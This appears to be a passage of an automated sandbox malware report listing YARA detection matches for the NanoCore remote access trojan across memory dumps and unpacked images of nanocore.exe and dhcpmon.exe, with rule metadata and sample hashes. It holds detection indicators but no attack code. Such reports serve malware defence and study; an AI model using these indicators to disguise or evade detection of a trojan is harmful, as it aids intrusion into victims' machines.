      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Matched YARA rules (metadata as reported by the sandbox, listed once; the match lines below refer to the rules by name):
      Nanocore_RAT_Gen_2: date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Nanocore_RAT_Feb18_1: date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      NanoCore: date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.5820000.11.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 11.2.dhcpmon.exe.233ba50.3.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE, Matched rules: Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
